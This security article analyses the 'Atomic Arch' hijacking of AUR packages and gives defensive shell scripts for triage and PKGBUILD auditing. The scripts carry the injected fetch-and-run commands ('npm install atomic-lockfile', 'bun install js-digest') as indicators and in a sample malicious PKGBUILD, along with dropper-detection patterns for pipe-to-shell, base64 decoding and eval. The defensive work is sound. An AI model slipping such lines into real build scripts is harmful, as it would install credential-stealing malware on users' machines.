Arch Linux Packages Compromised: Over 400 Affected in 'Atomic Arch' Attack
Tags: Arch Linux, AUR, Atomic Arch, Sonatype, cybersecurity, supply chain attack, rootkit, infostealer, Linux security, open source, developer security, npm


The AUR Was Never Safe: What the 'Atomic Arch' Attack on Arch Linux Packages Really Means

The Arch User Repository (AUR) has always presented a unique paradox. On one side, it offers community-driven software, a place to find almost anything for Arch Linux. On the other, it operates with minimal oversight, and anyone in the Arch ecosystem knows the mantra: read the PKGBUILD. This week, that mantra gained new urgency, as over 400 Arch Linux packages in the AUR were compromised in a supply chain attack, dubbed "Atomic Arch" by Sonatype.

The incident confirms what the community has long understood: the AUR's community-driven model is powerful, but it carries risk by design. This was not a zero-day in Arch Linux; it was an abuse of the trust model behind AUR packages. The official Arch repositories were not affected, but the AUR relies on users vetting what they build, and this incident shows where that breaks down: when the number of affected packages outruns what individual auditing can keep up with.

What Actually Happened: Malicious Packages Emerge

Starting on or around June 11, 2026, attackers took over more than 400 packages in the Arch User Repository. Sonatype named the campaign 'Atomic Arch' (Sonatype-2026-003775, CVSS 8.7). Sonatype initially counted just over 20 hijacked packages, but community trackers and greps of the AUR git mirrors quickly pushed that number past 400. The atomic-lockfile npm package used in the first wave showed 134 weekly downloads before its removal, but the real exposure came through the AUR build path rather than through npm users. Confirmed examples reported to the Arch mailing list include alvr and premake-git. This was not an exploit against the AUR infrastructure; it was an abuse of the AUR's package-adoption process and of the community's trust in it.

The attackers adopted abandoned or orphaned packages. That is a normal, sanctioned practice in open source: a maintainer steps away and someone else picks the package up. Here the new maintainers were not benevolent. They rewrote the PKGBUILD or .install scripts so that building or installing the package pulled down and executed their code, and they spoofed git commit author metadata so the changes appeared to come from a long-standing, uncompromised maintainer.

If you installed or updated any of these packages on or after June 11, 2026, treat the host as compromised.

The Attack Chain: From PKGBUILD to Rootkit

The attack chain unfolded as follows:

  1. Package Adoption: The attackers found orphaned packages in the AUR. These are easy to find, since the AUR lists orphans, and popular packages get abandoned regularly.
  2. Malicious PKGBUILD Injection: They modified the PKGBUILD (the build script for Arch Linux packages) or the .install script so that the added commands ran during the package's build or installation. The distinction matters: PKGBUILD functions run as the user running makepkg, while .install scriptlets run as root under pacman.
  3. First Wave Payload: The initial modifications added a command like npm install atomic-lockfile. This pulled atomic-lockfile@1.4.2 from npm. This npm package had a preinstall hook that executed a bundled Linux ELF binary named deps.
  4. Second Wave Payload: Later, attackers used different accounts to push bun install js-digest, which delivered a different malicious ELF binary. This shows an evolution in their delivery methods, likely to evade initial detection.
  5. Payload Execution: The deps ELF binary, written in Rust, is the core of the attack. Its main payload SHA-256 is 6144d433f8a0316869877b5f834c801251bbb936e5f1577c5680878c7443c98b. It's a credential stealer with an optional eBPF rootkit, designed specifically for developer workstations and build systems.
  6. Data Collection: According to analysis, the malware scrapes:
    • Cookies, tokens, and local storage from Chromium-based browsers (Chrome, Edge, Brave).
    • Session data from Electron apps like Slack, Discord, and Microsoft Teams.
    • GitHub, npm, and HashiCorp Vault tokens.
    • OpenAI/ChatGPT bearer tokens and account metadata.
    • SSH keys, known_hosts, and shell histories.
    • Docker and Podman credentials, plus VPN profiles.
  7. Exfiltration: All this stolen data gets sent over HTTP to temp.sh. For command and control, the malware uses a Tor onion service via a local loopback proxy, making it harder to trace.
  8. Persistence: The malware sets itself up to survive reboots. If it runs as root, it copies itself to /var/lib/ and creates a systemd service unit under /etc/systemd/system/ with Restart=always. If it runs as a normal user, it uses the home directory and a per-user systemd unit under ~/.config/systemd/user/.
  9. Secondary Payload: Analysis also flagged a secondary file tied to monero-wallet-gui as a possible, unanalyzed cryptominer.
  10. eBPF Rootkit (Optional): If the malware gains root privileges, it can load an eBPF rootkit. This is not for privilege escalation; it is for stealth. It hides the malware's processes, names, and socket inodes from standard system tools and kills attempts to attach a debugger to it. If the malware ran as root, a full system reinstallation becomes essential.

Assessing the Damage: Developer Workstations at Risk

The practical impact of this attack is substantial, especially for developers and anyone using Arch Linux as their primary workstation. The loss is not a few browser cookies; it is the credentials that gate your development and production access.

Consider what the collected items unlock: GitHub tokens, npm credentials, Vault tokens, SSH keys. These let an attacker push commits or releases to projects you maintain, publish poisoned versions of your npm packages, read secrets out of Vault, and log into servers or cloud infrastructure as you, which is how one compromised workstation becomes the next supply chain attack.

The optional eBPF rootkit is particularly insidious. Once it is loaded, user-space tools such as ps, ls and ss no longer show the malware's processes or sockets, so the usual triage commands run on the box itself cannot be trusted.

What We Do Now: Rebuilding Trust and Fortifying Defenses

Arch Linux maintainers, including Jonathan Grotelüschen, are identifying and reverting malicious commits, banning the accounts involved, and asking users to report suspect packages. This immediate response is necessary.

For users, the steps are direct. First, identify potential exposure: check any AUR package installed or updated on or after June 11, 2026; /var/log/pacman.log records every install and upgrade with a timestamp. Community-curated lists and detection scripts are available to help.

You should also grep your recent build history and AUR helper caches for npm install atomic-lockfile, bun install js-digest, and the payload path src/hooks/deps. Look for unknown systemd units under /etc/systemd/system/ and ~/.config/systemd/user/, and inspect /sys/fs/bpf/ (as root) for pinned BPF maps named hidden_pids, hidden_names, and hidden_inodes. Finally, review outbound connections for anything directed to Tor or temp.sh, bearing in mind that if the rootkit is loaded the socket listing on the host itself may be incomplete, so a network-side view (firewall or proxy logs) is the more reliable one.
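The triage steps above, as an added example script that is not part of the Sonatype report or of any Arch tooling. Each check is a function over a path, so it can be run against the real locations or against the constructed sample data at the bottom of the script. The real locations it assumes are /var/log/pacman.log, AUR helper clone directories such as ~/.cache/yay and ~/.cache/paru/clone, /sys/fs/bpf (root is needed to list pins) and the two systemd unit directories named above; the unit-file heuristic (Restart=always plus an ExecStart under /var/lib or a home directory) is an assumption drawn from the persistence description, not an indicator from the report.

```sh
#!/bin/sh
# Added example (not Sonatype's or the Arch project's tooling): the triage checks
# from the article, each as a function over a path so it can be pointed at the
# real location or at the constructed sample data at the bottom.
# Assumed real locations: /var/log/pacman.log, AUR-helper clone directories such as
# ~/.cache/yay and ~/.cache/paru/clone, /sys/fs/bpf (root needed to list pins),
# /etc/systemd/system and ~/.config/systemd/user.

# Indicators from the report. The two package names used in the demo are the two
# confirmed examples the article cites, not the full list of 400+.
IOC_STRINGS='npm install atomic-lockfile
bun install js-digest
src/hooks/deps'
IOC_BPF_MAPS='hidden_pids hidden_names hidden_inodes'

# flagged_installs LOG SINCE PKG... : pacman.log lines where a listed package was
# installed, upgraded or reinstalled on or after SINCE (YYYY-MM-DD). Exact-name
# match, so "premake" does not match "premake-git".
flagged_installs() {
    _log=$1; _since=$2; shift 2
    _re=""
    for _p in "$@"; do _re="$_re|$_p"; done
    _re="^(${_re#|})\$"
    awk -v since="$_since" -v re="$_re" '
        $2 == "[ALPM]" && $3 ~ /^(installed|upgraded|reinstalled)$/ {
            # $1 looks like [2026-06-12T09:15:03+0000]; ISO dates compare as strings
            if (substr($1, 2, 10) >= since && $4 ~ re) print
        }' "$_log"
}

# scan_caches DIR... : files under the given cache/clone directories that contain
# an indicator string. Fixed-string match, one grep per indicator.
scan_caches() {
    printf '%s\n' "$IOC_STRINGS" | while IFS= read -r _s; do
        grep -rlF -e "$_s" -- "$@" 2>/dev/null || true
    done | sort -u
}

# bpf_rootkit_pins DIR : pinned BPF objects carrying the rootkit's map names.
bpf_rootkit_pins() {
    for _m in $IOC_BPF_MAPS; do
        find "$1" -name "$_m" 2>/dev/null || true
    done
}

# suspect_units DIR : unit files that restart forever and start a binary from the
# places the malware copies itself to (/var/lib or a home directory). Heuristic;
# expect a few false positives from hand-written admin units.
suspect_units() {
    for _u in "$1"/*.service; do
        [ -f "$_u" ] || continue
        if grep -qE '^Restart=always' "$_u" &&
           grep -qE '^ExecStart=-?(/var/lib/|/home/|/root/)' "$_u"; then
            printf '%s\n' "$_u"
        fi
    done
}

# ---- constructed sample data (versions, paths and unit names are made up) ----
tmp=$(mktemp -d)
cat >"$tmp/pacman.log" <<'EOF'
[2026-06-09T10:00:00+0000] [ALPM] installed alvr (1.0-1)
[2026-06-10T08:02:11+0000] [ALPM] upgraded vim (1.0-1 -> 1.1-1)
[2026-06-12T09:15:03+0000] [ALPM] upgraded alvr (1.0-1 -> 1.1-1)
[2026-06-13T17:40:59+0000] [ALPM] upgraded premake-git (1.0-1 -> 1.1-1)
[2026-06-13T17:41:02+0000] [ALPM] installed premake (1.0-1)
EOF
mkdir -p "$tmp/cache/yay/alvr" "$tmp/cache/paru/clone/premake-git" "$tmp/cache/yay/clean-pkg"
printf 'build() {\n  npm install atomic-lockfile\n  make\n}\n' >"$tmp/cache/yay/alvr/PKGBUILD"
printf 'build() {\n  bun install js-digest\n  make\n}\n' >"$tmp/cache/paru/clone/premake-git/PKGBUILD"
printf 'build() {\n  make\n}\n' >"$tmp/cache/yay/clean-pkg/PKGBUILD"
mkdir -p "$tmp/bpf" "$tmp/units"
: >"$tmp/bpf/hidden_pids"
printf '[Service]\nExecStart=/var/lib/sample/deps\nRestart=always\n' >"$tmp/units/sample.service"
printf '[Service]\nExecStart=/usr/bin/example-daemon\nRestart=always\n' >"$tmp/units/example-daemon.service"

echo "== flagged packages installed or upgraded since 2026-06-11"
flagged_installs "$tmp/pacman.log" 2026-06-11 alvr premake-git
echo "== cached builds containing an indicator string"
scan_caches "$tmp/cache"
echo "== pinned BPF objects with rootkit map names"
bpf_rootkit_pins "$tmp/bpf"
echo "== units restarting a binary from /var/lib or a home directory"
suspect_units "$tmp/units"
```

On a real host, replace the sample arguments with /var/log/pacman.log, your helper's cache directory, /sys/fs/bpf and the two unit directories, and feed flagged_installs the community list of affected packages rather than the two names shown. The date filter only narrows the pacman.log search; an install before June 11 followed by an upgrade after it is still flagged, because every matching upgrade line is printed. Remember that a loaded rootkit can hide files and processes from the very tools this script calls, so a clean result on a host that ran a flagged package as root proves nothing.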

If a flagged package ran, assume the host is credential-compromised. Rotating all touched credentials is paramount: browser sessions, SSH keys, GitHub/npm tokens, Slack/Teams/Discord sessions, Vault tokens, Docker/Podman credentials, and any cloud keys must be reset.

If the package ran with root privileges, a full system reinstallation from trusted media is required. Once the eBPF rootkit is loaded, the tools you would use to verify a cleanup are exactly the ones it lies to, so an in-place clean cannot be verified. Attempting it is a high-risk proposition.

Going forward, a change in habits is required. Read the PKGBUILD and any .install hooks before building, especially for recently adopted or suddenly active packages. The AUR page shows each package's maintainer, last update and full git log, and AUR helpers such as paru and yay can show the diff against the version you last built; an injected npm install line stands out in that diff far more than it does in a full read.
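A first pass over "read the PKGBUILD" can be automated. The script below is an added example, not part of the Sonatype report or of any Arch tooling, and it serves both the PKGBUILD injection step in the attack chain above and the reading habit recommended here: it flags lines that fetch and execute code at build or install time. The package-manager alternative covers the two forms reported in this campaign (npm install atomic-lockfile and bun install js-digest); the pipe-to-shell, base64 and eval idioms are generic dropper patterns added here as an assumption. The two PKGBUILDs it runs over are constructed, with placeholder hashes and an invalid example domain; the position of the injected line inside build() is likewise an illustration, since the report does not say where in the PKGBUILD the attackers placed it.

```sh
#!/bin/sh
# Added example; not part of the Sonatype report or of any Arch tooling. It
# automates the first pass of "read the PKGBUILD": flag lines that fetch and run
# code at build or install time. The package-manager alternative covers the two
# forms reported in this campaign ("npm install atomic-lockfile", "bun install
# js-digest"); the pipe-to-shell, base64 and eval idioms are generic dropper
# patterns added here as an assumption, not indicators from the report.

SUSPECT_RE='(^|[[:space:];&(|])(npm|bun|pnpm|yarn|pip3?|cargo)[[:space:]]+(install|add|i)([[:space:]]|$)|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|(^|[[:space:];&(|])eval[[:space:]]'

# audit_pkgbuild FILE : print each suspect line with its line number and return 1
# if any were found, 0 otherwise. The notes about SKIP checksums and .install
# hooks are informational and do not change the return code.
audit_pkgbuild() {
    _file=$1
    _hits=$(grep -cE "$SUSPECT_RE" "$_file") || true
    grep -nE "$SUSPECT_RE" "$_file" | while IFS= read -r _l; do
        printf '%s:%s  <- runs fetched code at build time\n' "$_file" "$_l"
    done
    # 'SKIP' is normal for VCS sources (pkgver changes every build) but means
    # nothing pins the upstream content; for a tarball it is a red flag.
    if grep -qE "sums=.*'SKIP'|^[[:space:]]*'SKIP'" "$_file"; then
        printf '%s: a source checksum is SKIP (expected for -git packages, otherwise unpinned)\n' "$_file"
    fi
    # .install scriptlets run as root under pacman; they are part of what you read.
    if grep -q '^install=' "$_file"; then
        printf '%s: declares an .install hook; read it as well\n' "$_file"
    fi
    [ "$_hits" -eq 0 ]
}

# ---- constructed samples: a clean PKGBUILD and one with the first-wave injection ----
tmp=$(mktemp -d)
cat >"$tmp/PKGBUILD.clean" <<'EOF'
pkgname=example
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("$pkgname-$pkgver.tar.gz::https://example.invalid/v$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
cat >"$tmp/PKGBUILD.bad" <<'EOF'
pkgname=example-git
pkgver=1.0.r12.gabc1234
pkgrel=1
arch=('x86_64')
install=example-git.install
source=("git+https://example.invalid/example.git")
sha256sums=('SKIP')
pkgver() {
  cd example
  git describe --long --tags | sed 's/-/.r/;s/-/./'
}
build() {
  cd example
  npm install atomic-lockfile
  make
}
package() {
  cd example
  make DESTDIR="$pkgdir" install
}
EOF

for _f in "$tmp/PKGBUILD.clean" "$tmp/PKGBUILD.bad"; do
    if audit_pkgbuild "$_f"; then printf '%s: no findings\n' "$_f"; fi
done
```

Run audit_pkgbuild on the PKGBUILD your helper has cloned before you let it build; a non-zero return is a reason to stop and read the full diff, not a verdict. The regular expression is deliberately narrow: a PKGBUILD that legitimately runs npm (an Electron application, for instance) will trigger it, and that is the point, because such a package deserves a closer read anyway. It does not replace reviewing the .install file, which the script only points at.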

The tactic in "Atomic Arch" is not new; a PDF-viewer package was hijacked the same way, through adoption, in 2018. What is different is the scale and the sophistication of the payload. Supply chain attacks increasingly borrow the trust of open-source ecosystems instead of breaking their infrastructure.

The AUR's community model is its strength and its greatest vulnerability. This incident shows the limits of implicit trust and manual verification at the scale of a large open-source ecosystem, and the need for better tooling and stronger review mechanisms around package adoption.

Daniel Marsh
Former SOC analyst turned security writer. Methodical and evidence-driven, breaks down breaches and vulnerabilities with clarity, not drama.